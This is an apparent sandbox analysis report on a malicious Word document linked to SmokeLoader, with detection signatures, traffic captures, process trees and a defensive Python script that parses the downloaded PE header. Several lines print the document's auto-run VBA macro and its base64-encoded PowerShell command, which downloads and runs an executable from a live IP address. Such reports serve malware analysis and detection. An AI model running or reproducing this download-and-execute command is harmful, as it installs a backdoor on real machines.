Windows Analysis Report
472.rtf.doc

Overview

General Information

Sample name: 472.rtf.doc
renamed because original name is a hash value
Original sample name: 472.rtf.doc
Analysis ID: 1446716
MD5: 0bd1328012301d04bdc921acb321b820
SHA1: 724612a3c88f187aa000efe4ff4e9e04c9553696
SHA256: 7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66
Tags: doc, Dofoil, rtf, SmokeLoader

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected SmokeLoader
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Encrypted powershell cmdline option found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

AV Detection

Source: C:\Users\user\AppData\Local\Temp\svchost.exe Avira: detection malicious, Label: TR/Crypt.Agent.mvien
Source: C:\Users\user\AppData\Local\Temp\svchost.exe ReversingLabs: Detection: 91%
Source: 472.rtf.doc ReversingLabs: Detection: 26%
Source: 472.rtf.doc Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 45.84.0.173:80
Source: global traffic TCP traffic: 45.84.0.173:80 -> 192.168.2.22:49161
(these two lines repeat once per captured packet; every packet in the run belongs to this single connection between the sandbox host and 45.84.0.173:80)
Source: global traffic HTTP traffic detected:
HTTP/1.1 200 OK
Date: Thu, 23 May 2024 18:15:11 GMT
Server: Apache/2.4.38 (Debian)
Last-Modified: Tue, 21 May 2024 06:39:08 GMT
ETag: "2d000-618f1132a7b00"
Accept-Ranges: bytes
Content-Length: 184320
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 af 24 42 6c eb 45 2c 3f eb 45 2c 3f eb 45 2c 3f 56 0a ba 3f ea 45 2c 3f f5 17 a8 3f f4 45 2c 3f f5 17 b9 3f fb 45 2c 3f f5 17 af 3f 89 45 2c 3f cc 83 57 3f ec 45 2c 3f eb 45 2d 3f 86 45 2c 3f f5 17 a6 3f ea 45 2c 3f f5 17 b8 3f ea 45 2c 3f f5 17 bd 3f ea 45 2c 3f 52 69 63 68 eb 45 2c 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 09 4a 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 90 00 00 00 2c f4 01 00 00 00 00 f7 15 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 f4 01 00 04 00 00 c9 24 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 01 02 00 50 00 00 00 00 e0 f3 01 d0 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b6 8f 00 00 00 10 00 00 00 90 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 6a 01 00 00 a0 00 00
00 6c 01 00 00 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c c6 f1 01 00 10 02 00 00 2e 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 a0 00 00 00 e0 f3 01 00 a2 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected:
GET /download_22/server.exe HTTP/1.1
Host: 45.84.0.173
Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 45.84.0.173
(repeated once per packet; the download URL in the macro names the IP directly, so no DNS lookup precedes the connection)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{89AD645A-9CDB-46AF-ADC6-EB1F41B38A0D}.tmp
Source: global traffic HTTP traffic detected:
GET /download_22/server.exe HTTP/1.1
Host: 45.84.0.173
Connection: Keep-Alive
Source: powershell.exe, 00000006.00000002.358011203.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002929000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://45.84.0.173
Source: powershell.exe, 00000005.00000002.362102423.0000000002960000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.357966848.0000000002397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://45.84.0.173/download_22/server.exe
Source: powershell.exe, 00000006.00000002.357966848.000000000247E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.cr
Source: powershell.exe, 00000006.00000002.358011203.00000000038BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.362102423.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
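
The HTTP response above is the only payload that crossed the wire, and its first 0x290 bytes are enough to triage the file before it ever runs. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the DOS header, PE file header, PE32 optional header and section table transcribed from the "Data Raw" dump. The DOS stub and Rich header between offsets 0x40 and 0xf7 are not needed for parsing and are zero-filled here (an assumption, not the original bytes); the 184320-byte Content-Length comes from the response headers. Two things fall out: the on-disk size implied by the section table matches the Content-Length exactly (0x2d000, which is also the leading field of the Apache ETag, since Apache's default ETag starts with the size in hex), so the body was delivered whole, and the .data section reserves roughly 32 MB of virtual space against 0x2e00 bytes on disk, the kind of empty region a packed loader unpacks into at run time.

```python
"""Header triage of the PE served as /download_22/server.exe (added example, not the sample's code)."""
import struct
from datetime import datetime, timezone

# Transcribed from the report's "Data Raw" dump: DOS header (offsets 0x00-0x3f) ...
DOS_HEADER_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00
"""
# ... and the PE signature, file header, optional header and section table (0xf8-0x28f).
PE_HEADER_HEX = """
50 45 00 00 4c 01 04 00 98 09 4a 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 90 00 00
00 2c f4 01 00 00 00 00 f7 15 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00
05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 f4 01 00 04 00 00 c9 24 03 00 02 00 00 81
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00
8c 01 02 00 50 00 00 00 00 e0 f3 01 d0 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 84 01 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
b6 8f 00 00 00 10 00 00 00 90 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 64 61 74 61 00 00 66 6a 01 00 00 a0 00 00 00 6c 01 00 00 94 00 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c c6 f1 01 00 10 02 00 00 2e 00 00 00 00 02 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 a0 00 00 00 e0 f3 01
00 a2 00 00 00 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40
"""
CONTENT_LENGTH = 184320  # Content-Length of the HTTP 200 response in the report


def build_image() -> bytes:
    """Reassemble the header bytes; the DOS stub / Rich header gap is zero-filled (assumption)."""
    dos = bytes.fromhex(DOS_HEADER_HEX)
    pe = bytes.fromhex(PE_HEADER_HEX)
    e_lfanew = struct.unpack_from("<I", dos, 0x3C)[0]
    return dos + b"\x00" * (e_lfanew - len(dos)) + pe


def parse_pe(data: bytes) -> dict:
    """Minimal PE32 header parser (only the fields the triage below needs)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    machine, nsections, stamp, _symtab, _nsyms, opt_size, characteristics = struct.unpack_from(
        "<HHIIIHH", data, pe + 4)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry, = struct.unpack_from("<I", data, opt + 16)
    image_base, = struct.unpack_from("<I", data, opt + 28)
    size_of_image, size_of_headers = struct.unpack_from("<II", data, opt + 56)
    subsystem, dll_characteristics = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i  # IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, off)
        flags, = struct.unpack_from("<I", data, off + 36)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii"), "virtual_size": vsize,
                         "virtual_address": va, "raw_size": rsize, "raw_ptr": rptr,
                         "characteristics": flags})
    return {"machine": machine, "number_of_sections": nsections, "timestamp": stamp,
            "compiled": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
            "characteristics": characteristics, "entry_point": entry, "image_base": image_base,
            "size_of_image": size_of_image, "size_of_headers": size_of_headers,
            "subsystem": subsystem, "dll_characteristics": dll_characteristics,
            "sections": sections}


def on_disk_size(hdr: dict) -> int:
    """Last file offset any section header claims: the size a complete download must have."""
    return max(max(s["raw_ptr"] + s["raw_size"] for s in hdr["sections"]), hdr["size_of_headers"])


def triage(hdr: dict, content_length: int) -> list:
    """Cheap header checks worth running before the sample executes anywhere."""
    notes = []
    disk = on_disk_size(hdr)
    notes.append(f"section table ends at 0x{disk:x} ({disk} bytes); Content-Length {content_length}: "
                 + ("consistent" if disk == content_length else "MISMATCH, truncated or overlay present"))
    for s in hdr["sections"]:
        if s["raw_size"] and s["virtual_size"] > 8 * s["raw_size"]:
            notes.append(f"{s['name']}: virtual size 0x{s['virtual_size']:x} vs raw size "
                         f"0x{s['raw_size']:x}, space reserved for runtime unpacking")
    if not hdr["dll_characteristics"] & 0x0040:
        notes.append(f"no DYNAMIC_BASE: image always maps at 0x{hdr['image_base']:x}")
    if hdr["characteristics"] & 0x0001:
        notes.append("RELOCS_STRIPPED: cannot be relocated even if ASLR were requested")
    return notes


if __name__ == "__main__":
    header = parse_pe(build_image())
    print(f"machine 0x{header['machine']:x}, linked {header['compiled']}, "
          f"entry 0x{header['entry_point']:x}, SizeOfImage 0x{header['size_of_image']:x}")
    for note in triage(header, CONTENT_LENGTH):
        print(" -", note)
```

The TimeDateStamp decodes to 27 April 2023, a year before the server's Last-Modified, and the image carries neither DYNAMIC_BASE nor relocations, so it loads at 0x400000 every time. The GET request that fetched it had no User-Agent header at all, which is the default for System.Net.WebClient.DownloadFile and is what the "HTTP GET or POST without a user agent" signature keyed on.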

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

System Summary

Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 472.rtf.doc OLE, VBA macro line: Program = Shell(cmdStr, vbHide)
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
Source: 472.rtf.doc OLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function AutoOpen, String powershell: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;" Name: AutoOpen
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE, VBA macro line: cmdStr = "cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\svchost.exe
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_000007FE898B00DD 6_2_000007FE898B00DD
Source: 472.rtf.doc OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function AutoOpen Name: AutoOpen
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE, VBA macro line: Sub AutoOpen()
Source: 472.rtf.doc OLE indicator, VBA macros: true
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE indicator, VBA macros: true
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@11/17@0/1
Source: C:\Users\user\AppData\Local\Temp\svchost.exe Code function: 7_2_0244BF0B CreateToolhelp32Snapshot,Module32First, 7_2_0244BF0B
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$72.rtf.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp
Source: 472.rtf.doc OLE indicator, Word Document stream: true
Source: 472.rtf.doc OLE document summary: title field not present or empty
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{91706ACD-1867-4224-BC67-02D7D9560855}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFF8D2936508DC487F.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\timeout.exe Console Write: "Waiting for 3"
Source: C:\Windows\System32\timeout.exe Console Write: " seconds, press a key to continue ..."
Source: C:\Windows\System32\timeout.exe Console Write: "2" ... ", pr"
Source: C:\Windows\System32\timeout.exe Console Write: "1" ... ", pr"
Source: C:\Windows\System32\timeout.exe Console Write: "0" ... ", pr"
Source: C:\Windows\System32\timeout.exe Console Write: ", pr"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\timeout.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 472.rtf.doc ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
